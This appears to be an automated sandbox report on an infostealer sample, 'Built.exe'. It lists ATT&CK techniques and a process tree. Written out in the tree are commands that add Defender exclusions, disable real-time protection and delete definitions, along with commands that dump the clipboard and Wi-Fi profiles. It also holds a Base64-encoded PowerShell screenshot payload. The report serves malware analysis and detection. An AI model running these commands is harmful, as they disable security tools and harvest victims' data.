5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6

Resubmissions

08-11-2024 00:11

241108-agpcsaznfx 10

08-11-2024 00:07

241108-aeq4la1cla 10

08-11-2024 00:00

241108-aamwda1blg 10

Analysis

max time kernel
3s
max time network
8s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-11-2024 00:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

6.5MB
MD5

8c643afe3eae2bfbc531a83f8c1356c7
SHA1

252cec2459cc65df585c959d84b4f24f2e259af3
SHA256

5f2190af1debcee49a6aa8aa05f97492ce9bd4516c2d3cdaff8206f866117cf6
SHA512

e4d52b7537e0c298256c543f198a25e00b67f5f5bfede069f0d6a41696ee1ec0e1f8eac989f7208429af84854d558dbd31158605e65f891d2435e01990991bb8
SSDEEP

196608:1u4jYIJLc52Nt8cQS/1nXy2IIEZVMwICEc/jf:kutcStz9/1nXy22VJb

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
776	powershell.exe
4944	powershell.exe
3416	powershell.exe
4064	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0008000000023bdc-21.dat	acprotect
behavioral2/files/0x000a000000023bb0-28.dat	acprotect
behavioral2/files/0x000e000000023bd7-29.dat	acprotect
behavioral2/files/0x0008000000023bcc-46.dat	acprotect
behavioral2/files/0x000e000000023bc3-45.dat	acprotect
behavioral2/files/0x000a000000023bbc-44.dat	acprotect
behavioral2/files/0x000b000000023bb4-43.dat	acprotect
behavioral2/files/0x000b000000023bb3-42.dat	acprotect
behavioral2/files/0x000b000000023bb2-41.dat	acprotect
behavioral2/files/0x000a000000023bb1-40.dat	acprotect
behavioral2/files/0x000a000000023baf-39.dat	acprotect
behavioral2/files/0x0008000000023c0f-38.dat	acprotect
behavioral2/files/0x0008000000023c0e-37.dat	acprotect
behavioral2/files/0x0008000000023bdf-36.dat	acprotect
behavioral2/files/0x0008000000023bd9-33.dat	acprotect
behavioral2/files/0x0009000000023bd3-32.dat	acprotect

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4116	cmd.exe
1460	powershell.exe

Loads dropped DLL 17 IoCs

pid	Process
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe
3504	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2736	tasklist.exe
3920	tasklist.exe
5000	tasklist.exe
3748	tasklist.exe

UPX packed file 38 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023bdc-21.dat	upx
behavioral2/memory/3504-25-0x0000000074C30000-0x00000000751C2000-memory.dmp	upx
behavioral2/files/0x000a000000023bb0-28.dat	upx
behavioral2/files/0x000e000000023bd7-29.dat	upx
behavioral2/memory/3504-48-0x0000000074BC0000-0x0000000074BCD000-memory.dmp	upx
behavioral2/memory/3504-47-0x0000000074BD0000-0x0000000074BF2000-memory.dmp	upx
behavioral2/files/0x0008000000023bcc-46.dat	upx
behavioral2/files/0x000e000000023bc3-45.dat	upx
behavioral2/files/0x000a000000023bbc-44.dat	upx
behavioral2/files/0x000b000000023bb4-43.dat	upx
behavioral2/files/0x000b000000023bb3-42.dat	upx
behavioral2/files/0x000b000000023bb2-41.dat	upx
behavioral2/files/0x000a000000023bb1-40.dat	upx
behavioral2/files/0x000a000000023baf-39.dat	upx
behavioral2/files/0x0008000000023c0f-38.dat	upx
behavioral2/files/0x0008000000023c0e-37.dat	upx
behavioral2/files/0x0008000000023bdf-36.dat	upx
behavioral2/files/0x0008000000023bd9-33.dat	upx
behavioral2/files/0x0009000000023bd3-32.dat	upx
behavioral2/memory/3504-54-0x0000000074B90000-0x0000000074BB7000-memory.dmp	upx
behavioral2/memory/3504-56-0x0000000074B70000-0x0000000074B88000-memory.dmp	upx
behavioral2/memory/3504-58-0x0000000074B50000-0x0000000074B6F000-memory.dmp	upx
behavioral2/memory/3504-60-0x0000000074A10000-0x0000000074B4F000-memory.dmp	upx
behavioral2/memory/3504-62-0x00000000749F0000-0x0000000074A05000-memory.dmp	upx
behavioral2/memory/3504-66-0x0000000074970000-0x000000007499F000-memory.dmp	upx
behavioral2/memory/3504-65-0x00000000749A0000-0x00000000749AC000-memory.dmp	upx
behavioral2/memory/3504-72-0x00000000748C0000-0x0000000074968000-memory.dmp	upx
behavioral2/memory/3504-74-0x0000000074520000-0x00000000748B4000-memory.dmp	upx
behavioral2/memory/3504-78-0x0000000074490000-0x000000007449C000-memory.dmp	upx
behavioral2/memory/3504-76-0x00000000744A0000-0x00000000744B1000-memory.dmp	upx
behavioral2/memory/3504-71-0x0000000074BD0000-0x0000000074BF2000-memory.dmp	upx
behavioral2/memory/3504-70-0x0000000074C30000-0x00000000751C2000-memory.dmp	upx
behavioral2/memory/3504-83-0x00000000743E0000-0x000000007448E000-memory.dmp	upx
behavioral2/memory/3504-85-0x0000000074A10000-0x0000000074B4F000-memory.dmp	upx
behavioral2/memory/3504-84-0x0000000074B50000-0x0000000074B6F000-memory.dmp	upx
behavioral2/memory/3504-254-0x0000000074970000-0x000000007499F000-memory.dmp	upx
behavioral2/memory/3504-293-0x00000000748C0000-0x0000000074968000-memory.dmp	upx
behavioral2/memory/3504-316-0x0000000074520000-0x00000000748B4000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Built.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4020	cmd.exe
32	netsh.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5068	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3416	powershell.exe
776	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	tasklist.exe
Token: SeDebugPrivilege	776	powershell.exe
Token: SeDebugPrivilege	3416	powershell.exe
Token: SeDebugPrivilege	3920	tasklist.exe

Suspicious use of WriteProcessMemory 57 IoCs

description	pid	Process	procid_target
PID 2676 wrote to memory of 3504	2676	Built.exe	84
PID 2676 wrote to memory of 3504	2676	Built.exe	84
PID 2676 wrote to memory of 3504	2676	Built.exe	84
PID 3504 wrote to memory of 4136	3504	Built.exe	87
PID 3504 wrote to memory of 4136	3504	Built.exe	87
PID 3504 wrote to memory of 4136	3504	Built.exe	87
PID 3504 wrote to memory of 4112	3504	Built.exe	88
PID 3504 wrote to memory of 4112	3504	Built.exe	88
PID 3504 wrote to memory of 4112	3504	Built.exe	88
PID 3504 wrote to memory of 2964	3504	Built.exe	91
PID 3504 wrote to memory of 2964	3504	Built.exe	91
PID 3504 wrote to memory of 2964	3504	Built.exe	91
PID 4136 wrote to memory of 776	4136	cmd.exe	93
PID 4136 wrote to memory of 776	4136	cmd.exe	93
PID 4136 wrote to memory of 776	4136	cmd.exe	93
PID 4112 wrote to memory of 3416	4112	cmd.exe	94
PID 4112 wrote to memory of 3416	4112	cmd.exe	94
PID 4112 wrote to memory of 3416	4112	cmd.exe	94
PID 3504 wrote to memory of 5036	3504	Built.exe	95
PID 3504 wrote to memory of 5036	3504	Built.exe	95
PID 3504 wrote to memory of 5036	3504	Built.exe	95
PID 3504 wrote to memory of 3896	3504	Built.exe	96
PID 3504 wrote to memory of 3896	3504	Built.exe	96
PID 3504 wrote to memory of 3896	3504	Built.exe	96
PID 5036 wrote to memory of 2736	5036	cmd.exe	99
PID 5036 wrote to memory of 2736	5036	cmd.exe	99
PID 5036 wrote to memory of 2736	5036	cmd.exe	99
PID 3896 wrote to memory of 3920	3896	cmd.exe	101
PID 3896 wrote to memory of 3920	3896	cmd.exe	101
PID 3896 wrote to memory of 3920	3896	cmd.exe	101
PID 3504 wrote to memory of 1508	3504	Built.exe	102
PID 3504 wrote to memory of 1508	3504	Built.exe	102
PID 3504 wrote to memory of 1508	3504	Built.exe	102
PID 2964 wrote to memory of 4944	2964	cmd.exe	100
PID 2964 wrote to memory of 4944	2964	cmd.exe	100
PID 2964 wrote to memory of 4944	2964	cmd.exe	100
PID 3504 wrote to memory of 4116	3504	Built.exe	104
PID 3504 wrote to memory of 4116	3504	Built.exe	104
PID 3504 wrote to memory of 4116	3504	Built.exe	104
PID 3504 wrote to memory of 1924	3504	Built.exe	106
PID 3504 wrote to memory of 1924	3504	Built.exe	106
PID 3504 wrote to memory of 1924	3504	Built.exe	106
PID 3504 wrote to memory of 3412	3504	Built.exe	132
PID 3504 wrote to memory of 3412	3504	Built.exe	132
PID 3504 wrote to memory of 3412	3504	Built.exe	132
PID 3504 wrote to memory of 4020	3504	Built.exe	108
PID 3504 wrote to memory of 4020	3504	Built.exe	108
PID 3504 wrote to memory of 4020	3504	Built.exe	108
PID 3504 wrote to memory of 1524	3504	Built.exe	111
PID 3504 wrote to memory of 1524	3504	Built.exe	111
PID 3504 wrote to memory of 1524	3504	Built.exe	111
PID 3504 wrote to memory of 3392	3504	Built.exe	110
PID 3504 wrote to memory of 3392	3504	Built.exe	110
PID 3504 wrote to memory of 3392	3504	Built.exe	110
PID 3504 wrote to memory of 4148	3504	Built.exe	113
PID 3504 wrote to memory of 4148	3504	Built.exe	113
PID 3504 wrote to memory of 4148	3504	Built.exe	113

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2032	attrib.exe
3452	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2676
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4136
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  .scr'"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌  .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      PID:4944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3896
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3920
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1508
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:4116
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1924
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3412
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4020
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:32
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3392
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1524
  - - C:\Windows\SysWOW64\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4148
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG